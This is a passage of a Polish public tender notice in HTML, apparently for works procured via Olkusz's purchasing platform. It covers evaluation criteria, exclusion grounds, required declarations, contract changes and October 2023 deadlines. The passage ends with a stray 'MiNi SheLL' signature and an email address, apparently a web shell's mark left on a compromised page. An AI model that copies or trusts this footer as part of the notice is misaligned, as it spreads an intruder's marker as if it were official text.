<span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Wzór formularza ofertowego określa załącznik nr 1 do SWZ. Do oferty Wykonawca zobowiązany jest załączyć kosztorys ofertowy (podpisany), sporządzony na podstawie przedmiaru robót.<br/>2) Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu. Wzór oświadczenia stanowi załącznik nr 2 do SWZ.<br/>3) Dokumenty dotyczące samooczyszczenia wykonawcy, o którym mowa w art.110 ust. 2 ustawy Pzp, jeżeli wykonawca korzysta z samooczyszczenia.<br/>4) Do oferty Wykonawca załącza również Pełnomocnictwo (jeżeli dotyczy)<br/>5) Wykaz rozwiązań równoważnych (jeżeli dotyczy) – wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku wykonawca załącza do oferty wykaz rozwiązań równoważnych z jego opisem lub normami.<br/>6) Zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca, wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów<br/>ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. Wykonawca nie może zastrzec informacji, o których mowa w art. 222 ust. 5 ustawy Pzp. Szczegółowe informacje dotyczące składanych oświadczeń i dokumentów określone zostały w rozdziale IX SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia: Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia na zasadach określonych w art. 58-59 ustawy Pzp. W takim przypadku: - Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. - Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem; - Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (tj. przez każdego z Wykonawców lub upoważnionego pełnomocnika). Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia składają odrębnie:- każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana któregokolwiek postanowienia umowy wymaga zgody obu stron wyrażonej na piśmie w formie aneksu do umowy pod rygorem nieważności. Zamawiający, zgodnie z art. 455 ust. 1 ustawy Pzp, przewiduje możliwość dokonania zmian postanowień zawartej umowy w sprawie zamówienia publicznego, w przypadkach i na warunkach określonych w § 15 wzoru<br/>umowy, stanowiącym załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-31 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/olkusz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-31 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-11-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy wykonawcę na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego w przypadku wystąpienia którejkolwiek z określonych w niej przesłanek. W celu potwierdzenia braku podstaw do wykluczenia na podstawie w/w przesłanki Zamawiający wymaga złożenia oświadczenia o niepodleganiu wykluczeniu potwierdzające brak podstaw wykluczenia na dzień składania ofert w zakresie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego – zawarte w druku oświadczenia i niepodleganiu wykluczeniu. W przypadku składania oferty wspólnej przez kilku wykonawców, każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia składa powyższe oświadczenie.

Creat By MiNi SheLL
Email: jattceo@gmail.com